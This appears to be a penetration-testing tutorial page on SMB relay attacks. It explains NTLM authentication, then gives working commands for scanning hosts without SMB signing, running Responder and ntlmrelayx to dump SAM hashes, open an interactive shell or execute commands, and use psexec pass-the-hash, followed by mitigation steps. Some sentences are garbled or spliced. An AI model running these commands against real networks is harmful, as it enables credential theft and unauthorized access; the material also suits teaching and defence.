SMB Relay Attacks

When cracking a victim’s password hash becomes impractical, such as in cases where companies enforce strong password policies like 21-character requirements or something, attackers can use SMB relaying attacks to bypass this obstacle and still gain unauthorized access.

What is SMB?

Server Message Block (SMB) is a protocol used for network file sharing that enables devices within the same network to access shared resources like files and printers. It operates on the Application and Presentation Layers and typically uses port 445. SMB requires users to authenticate before accessing resources, and this authentication is often based on the NTLM protocol (usually NTLMv2).

How NTLM Authentication Works

NTLM (NT LAN Manager) is a challenge-response authentication protocol used in Windows. Here's how it works:

  1. When a client requests access to a service, the service sends a random challenge (nonce).

  2. The client encrypts this challenge using its password hash and sends it back.

  3. The service forwards the encrypted challenge and the clear-text challenge to the Domain Controller (DC).

  4. The DC, which stores all user and resource hashes, encrypts the challenge with the user’s hash.

  5. If the encrypted challenge matches the one sent by the client, access is granted.onnecting to their malicious system instead of the intended server.

The Attack Process (SMB Relaying)

The attacker doesn't crack the password. Instead, they just "relay" the challenge and response between the victim and another server. Here's how:

  1. Intercept Connection: The attacker tricks the victim's device into connecting to them instead of the real server. This could be done by:

    • Responding to broadcast requests (e.g., LLMNR poisoning).

    • Spoofing a network resource.

  2. Get the Challenge: The attacker forwards the victim’s login request to a target server. The target server sends its challenge back (just like normal).

  3. Relay the Challenge: The attacker forwards this challenge to the victim. The victim, believing it is from the real server, encrypts it with their password hash and sends the response.

  4. Authenticate as the Victim: The attacker sends the victim’s response to the target server. Since the response matches the challenge, the target server thinks the victim has logged in.

For this attack to work, the following conditions must be met:

  1. Same Network

  2. LLMNR Enabled

  3. SMB Signing Disabled/Not Required

  4. Elevated User ( root - admin ) Hash

Exploiting SMB (AKA SMB Relay Attacks)

Step 1: The Attacker Identifies Workstations without SMB Signing Enforced

nmap --script=smb2-security-mode.nse -p445 10.10.10.0/24

"Message signing enabled but not required."

Message signing used to add a digital signature to every SMB message to prevent tampering and verify the sender. Without it enforced, attackers can exploit SMB relaying attacks. By default, Windows enables it but doesn't require it, leaving systems vulnerable.

Step 2: The Attacker Sets Up Their Attack

First, we need to configure Responder and ntlmrelayx fto avoid responding to directly, so it can relay those requests to ntlmrelayx.

sudo nano  /etc/responder/Responder.conf
nsure that SMB and HTTP responses are set to off

Next, launch Responder.

sudo responder –I eth0 -dwP

Finally, launch ntlmrelayx and wait for an event to occur.

sudo ntlmrelayx.py –tf targets.txt –smb2support

Step 3: An Event Occurs and Credentials Get Relayed

Behind the scenes, an event (such as LLMNR poisoning) has occurred. Responder will capture this event, pass it to ntlmrelayx, which will relay the credentials to the targets in our targets file.

Below is what a successful relay looks like.

As you can see here, the local SAM hashes (the password hashes from the victim machine) dumped to the terminal. You can either crack these hashes offline or, more effectively, use pass-the-hash attacks to gain access to the victim machine without needing to know the actual password.

the beauty of relay attacks is that you do not need to ever know the password to pull off the attack. So much for a good password policy!

Gain Shell Access or Run Commands

While gaining a shell on the target is not always necessary for a successful SMB relay attack, it can be a valuable option to have in certain scenarios, especially when further manual actions are required in the target environment.

With ntlmrelayx, you can also attempt to gain shell access or run arbitrary commands on the victim machine.

sudo ntlmrelayx.py –tf targets.txt –smb2support -i
nc 127.0.0.1 11000

We can also run commands remotely. To run a command (e.g., whoami) on the victim machine during the attack:

sudo ntlmrelayx –tf targets.txt –smb2support –c “whoami”

While tools like Metasploit can be used for post-exploitation tasks, they are sometimes detected by security systems. An effective alternative is psexec.py, which can also leverage the victim’s hash to execute commands. For example:

psexec.py administrator@10.0.0.25 -hashes <hash>

there also a few other tool like wmiexec.py and smbexec depends on the target’s environment and security measures.

How Can SMB Relay Attacks Be Mitigated?

Main Defense: Enable SMB Signing

  • Pros: Completely stops SMB relay attacks.

  • Cons: May cause performance issues, especially with SMBv1 and legacy devices.

To configure Active Directory to enforce SMB signing, enable the following policies in Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options:

  • Client-side:

    • Microsoft network client: Digitally sign communications (always)

    • Microsoft network client: Digitally sign communications (if server agrees)

  • Server-side:

    • Microsoft network server: Digitally sign communications (always)

    • Microsoft network server: Digitally sign communications (if client agrees)

Confirming the Mitigation Run this command to verify SMB signing is enabled:

reg query HKLM\System\CurrentControlSet\Services\LanManServer\Parameters | findstr /I securitysignature

If the result shows ‘0x1’, SMB signing is active.

Alternate Defenses

  • Account tiering: Separate admin accounts (e.g., “bob” and “bob-da”) to limit access based on task needs.

  • Local admin restrictions: Limit local admin access to reduce the effectiveness of relay attacks.

PreviousLLMNR PoisoningNextIPv6 Attacks ( IPv6 DNS Takeover )

Last updated